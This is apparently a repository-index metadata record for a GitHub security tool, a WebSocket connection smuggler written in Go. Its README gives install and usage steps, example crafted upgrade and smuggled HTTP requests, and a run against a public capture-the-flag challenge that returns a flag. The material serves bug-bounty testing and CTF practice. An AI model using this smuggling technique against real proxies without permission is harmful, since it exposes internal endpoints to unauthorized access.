{"id":13762738,"url":"https://github.com/hahwul/websocket-connection-smuggler","last_synced_at":"2025-10-06T18:44:34.572Z","repository":{"id":57518861,"uuid":"224883683","full_name":"hahwul/websocket-connection-smuggler","owner":"hahwul","description":"websocket-connection-smuggler","archived":false,"fork":false,"pushed_at":"2020-01-22T16:14:56.000Z","size":3060,"stargazers_count":68,"open_issues_count":0,"forks_count":15,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-05-06T21:03:19.617Z","etag":null,"topics":["bugbounty","hacking","security","testing-tools","websocket","websocket-connection-smuggling"],"latest_commit_sha":null,"homepage":null,"language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/hahwul.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-11-29T15:59:54.000Z","updated_at":"2024-12-24T06:19:43.000Z","dependencies_parsed_at":"2022-09-26T18:00:44.658Z","dependency_job_id":null,"html_url":"https://github.com/hahwul/websocket-connection-smuggler","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hahwul%2Fwebsocket-connection-smuggler","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hahwul%2Fwebsocket-connection-smuggler/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hahwul%2Fwebsocket-connection-smuggler/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hahwul%2Fwebsocket-connection-smuggler/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ha
hwul","download_url":"https://codeload.github.com/hahwul/websocket-connection-smuggler/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":252769398,"owners_count":21801376,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","hacking","security","testing-tools","websocket","websocket-connection-smuggling"],"created_at":"2024-08-03T14:00:56.099Z","updated_at":"2025-10-06T18:44:29.536Z","avatar_url":"https://github.com/hahwul.png","language":"Go","funding_links":["https://www.paypal.me/hahwul","https://www.buymeacoffee.com/hahwul"],"categories":["Weapons"],"sub_categories":["Tools"],"readme":"\u003cimg src=\"https://user-images.githubusercontent.com/13212227/70248653-8de45d00-17be-11ea-9602-6b8f2754ddfb.png\"\u003e\n\n\u003ca href=\"https://twitter.com/intent/follow?screen_name=hahwul\"\u003e\u003cimg src=\"https://img.shields.io/twitter/follow/hahwul?style=flat-square\"\u003e\u003c/a\u003e\n\n# websocket-connection-smuggler\n## Dependency\n```cassandraql\n$ go get -u github.com/c-bata/go-prompt\n```\n\n## Install \n```cassandraql\n$ go get github.com/hahwul/websocket-connection-smuggler\n```\n\nor \n\n```cassandraql\n$ git clone https://github.com/hahwul/websocket-connection-smuggler\n$ cd websocket-connection-smuggler\n$ go build\n$ ./websocket-connection-smuggler\n```\n\n## Usage\n### 1. run wcs(websocket-connection-smuggler)\n```cassandraql\n$ websocket-connection-smuggler\n```\n\n### 2. set target address(domain or ip address)\n```cassandraql\n$ WCS(...) \u003e set target {your target}\n```\n\n### 3. 
is SSL? (default is false)\n```cassandraql\n# HTTPS\n$ WCS(...) \u003e set ssl true\n\n# HTTP\n$ WCS(...) \u003e set ssl false\n```\n\n### 4. set original request(o_data)\n\nIt uses the default editor defined in the environment variables, such as vim or nano. If you don't have any special settings, vim is the default.\n```cassandraql\n$ WCS(...) \u003e set o_data\n```\n\ne.g.\n```cassandraql\nGET /socket.io/?transport-websocket HTTP/1.1\nHost: localhost:80\nSec-WebSocket-Version: 4444\nUpgrade: websocket\n\n```\n\n### 5. set smuggling request(s_data)\n\nIt uses the default editor defined in the environment variables, such as vim or nano. If you don't have any special settings, vim is the default.\n```cassandraql\n$ WCS(...) \u003e set s_data\n```\n\ne.g.\n```cassandraql\nGET /flag HTTP/1.1 \nHost: localhost:5000\n\n```\n\n## Test against 0ang3el Websocket Smuggling Challenge\n```\n\n             ___          \n            /   \\\\        \n       /\\\\ | . . \\\\       \n     ////\\\\|     ||       \n   ////   \\\\ ___//\\       \n  ///      \\\\      \\      \n ///       |\\\\      |     \n//         | \\\\  \\   \\    \n/          |  \\\\  \\   \\   \n           |   \\\\ /   /   \n           |    \\/   /    \n            ---------\n     WebSocket Connection Smuggler\n     by @hahwul\n\nWCS(target=\u003eNone | ssl=\u003efalse ) \u003e set target challenge.0ang3el.tk:80\nWCS(target=\u003echallenge.0ang3el.tk:80 | ssl=\u003efalse ) \u003e set o_data\nWCS(target=\u003echallenge.0ang3el.tk:80 | ssl=\u003efalse ) \u003e set s_data\nWCS(target=\u003echallenge.0ang3el.tk:80 | ssl=\u003efalse ) \u003e send\nGET /socket.io/?transport-websocket HTTP/1.1\nHost: localhost:80\nSec-WebSocket-Version: 4444\nUpgrade: websocket\n\n2019/11/30 03:39:15 HTTP/1.1 200 OK\nContent-Type: application/json\nContent-Length: 49\nDate: Fri, 29 Nov 2019 18:39:15 GMT\n\n{\"flag\": \"In 50VI37 rUS5I4 vODK@ DRiNKs YOu!!!\"}\ngth: 119\nDate: Fri, 29 Nov 2019 18:39:14 GMT\n\n        
�0{\"pingInterval\":25000,\"pingTimeout\":60000,\"upgrades\":[\"websocket\"],\"sid\":\"5148720e07f240a99e6aa7457f41686f\"}�40\n```\n\n## Video on asciinema\n[![asciicast](https://asciinema.org/a/vSYXtlQtvh7yBh0uBES9r5BMV.svg)](https://asciinema.org/a/vSYXtlQtvh7yBh0uBES9r5BMV)\n\n## Donate\nI like coffee! I'm a coffee addict.\u003cbr\u003e\n\u003ca href=\"https://www.paypal.me/hahwul\"\u003e\u003cimg src=\"https://www.paypalobjects.com/digitalassets/c/website/logo/full-text/pp_fc_hl.svg\" height=\"50px\"\u003e\u003c/a\u003e\n\u003ca href=\"https://www.buymeacoffee.com/hahwul\"\u003e\u003cimg src=\"https://cdn.buymeacoffee.com/buttons/default-black.png\" alt=\"Buy Me A Coffee\" height=\"50px\"\u003e\u003c/a\u003e\n\n## Reference\n- https://speakerdeck.com/0ang3el/whats-wrong-with-websocket-apis-unveiling-vulnerabilities-in-websocket-apis\n- https://www.hahwul.com/2019/10/websocket-connection-smuggling.html\n- https://github.com/hahwul/websocket-connection-smuggling-go\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhahwul%2Fwebsocket-connection-smuggler","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhahwul%2Fwebsocket-connection-smuggler","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhahwul%2Fwebsocket-connection-smuggler/lists"}